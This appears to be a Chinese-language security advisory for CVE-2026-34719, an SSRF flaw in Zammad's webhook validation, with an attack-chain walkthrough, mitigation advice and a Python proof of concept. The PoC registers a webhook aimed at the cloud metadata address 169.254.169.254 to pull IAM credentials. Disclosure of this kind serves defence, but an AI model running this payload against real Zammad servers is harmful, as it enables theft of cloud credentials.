CVE-2026-34719 CVSS 4.3 中危

CVE-2026-34719 Zammad Webhook信息泄露漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34719

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Zammad

漏洞概述

Zammad是一个基于Web的开源帮助台/客户支持系统。在7.0.1和6.5.4版本之前，其Webhook模型缺少对回环地址或链路本地地址的适当验证。系统仅检查URL协议（HTTP/HTTPS）和主机名，而未对目标IP地址进行严格限制。攻击者可利用此漏洞通过配置恶意Webhook，向云提供商的元数据服务（如169.254.169.254）发起请求，从而获取敏感的机密元数据信息。该问题已在7.0.1和6.5.4版本中修复。

技术细节

该漏洞的根本原因是Zammad在处理Webhook配置时的输入验证机制存在缺陷。当用户配置Webhook或系统触发Webhook任务时，验证逻辑仅检查了URL Scheme（http/https）和Hostname，未实施有效的IP地址黑名单校验（例如未拦截127.0.0.1或链路本地地址）。拥有低权限账户的攻击者可以构造指向内部敏感资源（如AWS IMDSv1元数据服务接口）的Webhook请求。当Zammad服务器处理该Webhook时，会向内网地址发起HTTP请求，并将响应内容返回或记录，导致服务端请求伪造（SSRF），进而造成云环境凭证等敏感信息泄露。

攻击链分析

STEP 1

侦察与访问

攻击者获取Zammad系统的低权限用户账户访问权限。

STEP 2

漏洞利用

攻击者导航至Webhook设置页面，创建一个新的Webhook，将Endpoint字段设置为内部元数据服务的IP地址（如http://169.254.169.254），绕过主机名检查。

STEP 3

触发请求

攻击者执行触发Webhook的操作（如创建或更新工单），迫使Zammad服务器向攻击者指定的内网地址发送HTTP请求。

STEP 4

信息泄露

Zammad服务器将内网服务的响应数据（如云端IAM临时凭证）返回给攻击者或存储在日志中，导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept (Conceptual)
# This script demonstrates how an attacker might configure a malicious webhook
# to exploit the SSRF vulnerability and access cloud metadata.

import requests
import json

TARGET_HOST = "https://vulnerable-zammad-instance.com"
# Common AWS Metadata IP (Link-local address)
SSRF_PAYLOAD = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Attacker's credentials
AUTH_TOKEN = "Bearer <attacker_session_token>"

headers = {
    "Authorization": AUTH_TOKEN,
    "Content-Type": "application/json"
}

# Malicious webhook configuration
webhook_config = {
    "name": "Admin Export",
    "endpoint": SSRF_PAYLOAD,
    "method": "get",
    "trigger": "ticket_update"
}

try:
    response = requests.post(
        f"{TARGET_HOST}/api/v1/webhooks",
        headers=headers,
        data=json.dumps(webhook_config)
    )

    if response.status_code == 201:
        print("[+] Malicious webhook created successfully.")
        print("[+] Triggering webhook (e.g., by updating a ticket) will leak metadata.")
    else:
        print(f"[-] Failed to create webhook: {response.text}")

except Exception as e:
    print(f"Error: {e}")

影响范围

Zammad < 7.0.1

Zammad < 6.5.4

防御指南

临时缓解措施

如果无法立即升级软件，建议在网络层面通过安全组或防火墙规则，严格限制Zammad服务器对内网敏感地址段（如127.0.0.0/8, 169.254.0.0/16等）的出站访问。同时，应禁用普通用户创建Webhook的权限，仅限管理员操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表